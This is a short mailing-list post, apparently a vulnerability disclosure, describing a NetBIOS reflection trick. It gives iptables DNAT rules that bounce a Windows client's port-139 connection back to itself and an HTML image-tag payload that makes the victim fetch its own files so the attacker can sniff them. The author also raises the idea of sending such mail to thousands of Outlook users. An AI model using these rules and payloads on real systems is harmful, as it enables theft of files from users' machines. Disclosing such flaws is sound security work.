Hi all, Last night I was debguging a netbios connection between two machines and I remembered of something real simple and "stupid". I can't recall of reading anything on the subject but fact is i didn't do any kind of research, so sorry if this is a known issue. Mirroring Netbios connections from windows clients. Lacking a better term, I'm calling this "mirror" because the idea is to put a windows client talking Netbios with him self. I've prepared a simple iptables based firewall on a linux box, so that beeing 10.10.10.1 the firewall external interface and 10.10.10.2 the windows client, this simple rules apply(may wrap): -A PREROUTING -t nat -s 10.10.10.2 -d 10.10.10.1 -p tcp -m tcp --dport 139 -j DNAT --to-destination 10.10.10.2:139 -A POSTROUTING -o eth0 -j MASQUERADE Basically, what this does (obviously) is "mirror" the connections to port 139 of the firewall from the windows client to that same port on the windows client, causing it in fact to be talking Netbios with him self. The Netbios connection is established and authenticated successfully, wich allows me to sniff on the (unencrypted) traffic on the linux box. So, If the user on the windows workstation visits a web page on my linux box that has (for example) <IMG SRC="file://10.10.10.1/c$/boot.ini"> he will in fact be reading his own "boot.ini", and will be able to read it also by dumping the port 139 traffic on my firewall. Now, this sonds really simple and "stupid", and of course there's a strong possibility that I'm looking at this from a totally wrong perspective, if so I am sorry, but doesn't this look like it allows me to send a html mail to 10000 windows/outlook users and use this to read arbitrary files on their workstations ( either by looking at the traffic, or coding a simple program that parses the netbios traffic)? Best regards, Joao Gouveia ------------ tharbad@kaotik.org
Attachment:
signature.asc
Description: This is a digitally signed message part